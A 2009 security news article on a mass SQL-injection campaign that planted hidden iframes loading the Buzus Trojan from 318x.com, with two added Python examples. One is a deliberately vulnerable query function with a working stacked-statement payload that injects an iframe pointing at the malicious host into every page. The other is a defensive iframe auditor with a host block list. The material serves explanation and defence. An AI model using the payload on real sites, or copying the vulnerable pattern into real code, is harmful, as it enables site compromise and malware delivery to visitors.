132,000 Web Pages Infested with Malware Links
As reported on December 10, 2009, a SQL-injection attack had compromised some 132,000 websites, injecting into them a hidden link that pulled malicious code from 318x.com. The final payload was a backdoor Trojan, Buzus, which carries a rootkit component and is known for stealing financial data such as credit card details.
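The mechanism behind a compromise of this kind, as an added illustration that is not taken from the article, from ScanSafe, or from any site involved: a request parameter is pasted into SQL text, and a stacked statement in that parameter appends a hidden iframe to every page stored in the database. The table, its rows, the function names and the iframe path are all constructed for the example; `sqlite3.executescript` stands in for a database driver that accepts several statements in one call (as Microsoft SQL Server does), and the payload shown is a generic one, not the payload used in the attack described above. The hardened version validates and binds the parameter, so the same input is rejected.

```python
import sqlite3

# Constructed sample data standing in for a site's CMS content (not real data).
SAMPLE_PAGES = [
    (1, "Home", "<p>Welcome to our site.</p>", 0),
    (2, "About", "<p>We sell widgets.</p>", 0),
    (3, "Contact", "<p>Email us.</p>", 0),
]

# Hypothetical payload: a stacked UPDATE appends a zero-sized iframe to every page body.
# The host is the one named in the article; the path and attributes are assumptions.
INJECTED_IFRAME = '<iframe src="http://318x.com/x.htm" width="0" height="0"></iframe>'
PAYLOAD = "1; UPDATE pages SET body = body || '" + INJECTED_IFRAME + "';"


def make_db():
    """Create an in-memory database holding the constructed sample pages."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT, views INTEGER)"
    )
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?, ?)", SAMPLE_PAGES)
    conn.commit()
    return conn


def count_views_vulnerable(conn, page_id):
    """Deliberately vulnerable: the id from the request is pasted into the SQL text.
    executescript() stands in for a driver that accepts stacked statements, so an
    attacker-supplied ';' turns a harmless counter update into a site-wide rewrite
    that runs with the application's own database privileges."""
    conn.executescript("UPDATE pages SET views = views + 1 WHERE id = " + str(page_id))
    conn.commit()


def count_views_hardened(conn, page_id):
    """The same operation done safely: the id is validated as an integer and passed
    as a bound parameter, so it can never be interpreted as SQL."""
    try:
        page_id = int(page_id)
    except (TypeError, ValueError):
        raise ValueError("page id must be an integer")
    conn.execute("UPDATE pages SET views = views + 1 WHERE id = ?", (page_id,))
    conn.commit()


def infected_page_ids(conn):
    """Return the ids of pages whose body now carries an iframe (the injection's footprint)."""
    rows = conn.execute("SELECT id FROM pages WHERE body LIKE '%<iframe%' ORDER BY id")
    return [r[0] for r in rows]


def demo():
    """Run a legitimate id and the payload through both versions.

    Returns (infected ids after the vulnerable path, infected ids after the hardened
    path, whether the hardened path rejected the payload)."""
    vuln = make_db()
    count_views_vulnerable(vuln, 1)        # legitimate use works as intended
    count_views_vulnerable(vuln, PAYLOAD)  # the stacked UPDATE rewrites every page
    hard = make_db()
    count_views_hardened(hard, 1)
    try:
        count_views_hardened(hard, PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    return infected_page_ids(vuln), infected_page_ids(hard), rejected


if __name__ == "__main__":
    print(demo())
```

The point to take from the vulnerable path is that the abused query was a write the application was allowed to make (a view counter), not a content-editing feature: whatever the application's database account can do, the injected statement can do, which is how one parameter on one page rewrites every row in the table.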
ScanSafe first detected the attack on November 21, 2009, and published its report on December 9, 2009, by which time some 125,000 websites had been affected. The report names knowledgespeak.com, parisattitude.com, and yementimes.com among the affected sites.
The affected sites are hosted in different geographical locations and range widely in size, as a Google search for the injected iframe makes evident.
Users who visit the infected web pages encounter a hidden link that downloads code from several websites connected to 318x.com. If the visiting computer runs unpatched versions of Internet Explorer, Adobe Flash or any other Microsoft program, the code exploits them to install malware called Backdoor.Win32.Buzus.croo, said Mary Landesman, a researcher at ScanSafe, as reported by The Register on December 10, 2009.
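The hidden link described above is the artefact a site owner can hunt for in stored content. The following auditor is an added example written for this page, not a tool from ScanSafe or the article; it flags an iframe when its source host is on a block list (seeded here only with 318x.com, the host the article names) and, independently, when the iframe is zero-sized or CSS-hidden, because injected code is served from several rotating hosts and a list of hosts alone misses the next one. The sample page bodies are constructed for the example; the hidden-iframe heuristic is the author's, and any real deployment would extend the host list from its own telemetry.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Seeded from the article; a real deployment extends this from its own telemetry.
KNOWN_BAD_HOSTS = {"318x.com"}

# Constructed sample page bodies (not taken from any real site).
SAMPLE_PAGES = {
    "clean": '<p>Hello</p><iframe src="https://www.youtube.com/embed/abc" '
             'width="560" height="315"></iframe>',
    "known_host": '<p>Hello</p><iframe src="http://318x.com/x.htm" width="0" height="0"></iframe>',
    "hidden_unknown_host": '<div><iframe src="http://example.net/a.htm" style="display: none"></iframe></div>',
    "zero_size_subdomain": '<iframe src="http://cdn.318x.com/b.htm" width=0 height=0>',
}


def _is_hidden(attrs):
    """Heuristic: zero-sized or CSS-hidden iframes have no legitimate reason to exist."""
    for dim in ("width", "height"):
        if attrs.get(dim, "").strip().lower() in {"0", "0px"}:
            return True
    style = attrs.get("style", "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


def _is_bad_host(src):
    """True when src points at a listed host or any of its subdomains."""
    host = (urlsplit(src).hostname or "").lower()
    return any(host == bad or host.endswith("." + bad) for bad in KNOWN_BAD_HOSTS)


class IframeAuditor(HTMLParser):
    """Collects suspicious <iframe> start tags while parsing one page body."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {name.lower(): (value or "") for name, value in attrs}
        src = a.get("src", "")
        reasons = []
        if _is_bad_host(src):
            reasons.append("known-bad host")
        if _is_hidden(a):
            reasons.append("hidden iframe")
        if reasons:
            line, col = self.getpos()
            self.findings.append({"src": src, "reasons": reasons, "line": line, "col": col})


def audit_html(html):
    """Return a list of findings for one page body; an empty list means nothing flagged."""
    auditor = IframeAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


def audit_pages(pages):
    """Audit a mapping of page name -> HTML body, as it would be read from a CMS table."""
    return {name: audit_html(body) for name, body in pages.items()}


if __name__ == "__main__":
    for name, findings in audit_pages(SAMPLE_PAGES).items():
        print(name, findings)
```

Running the auditor over a database export rather than over live pages is the more useful mode: the injection lands in stored content, so the export shows every affected row and column, which is what has to be cleaned before the site is served again. A visible, full-sized embed from an unlisted host (the "clean" sample) is deliberately left alone.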
According to Landesman, a new malware gang appears to be behind these particular SQL-injection attacks. The ScanSafe researcher also states that she is not certain the gang is adequately versed in the method of attack: although it may be an experienced gang of attackers, this large-scale website attack is its first attempt.
In an advisory, ScanSafe describes the attack as an ongoing project: the company has been tracking the malware used in the attack's final stage and has seen some of that code being modified, some files removed, and new ones introduced. Several of the files carry a .jpg extension, though most are .js files.
The researchers placed this mass website attack alongside other sophisticated mass compromises. Some of those earlier attacks generated their links dynamically, which made it much harder for researchers to locate them through online searches; the Gumblar attack, for example, planted its attack code directly on the compromised websites, making the unwanted code very difficult for defenders to remove.
Related article: “Loopholes did not cause online banking thefts”: ICBC
» SPAMfighter News - 21-12-2009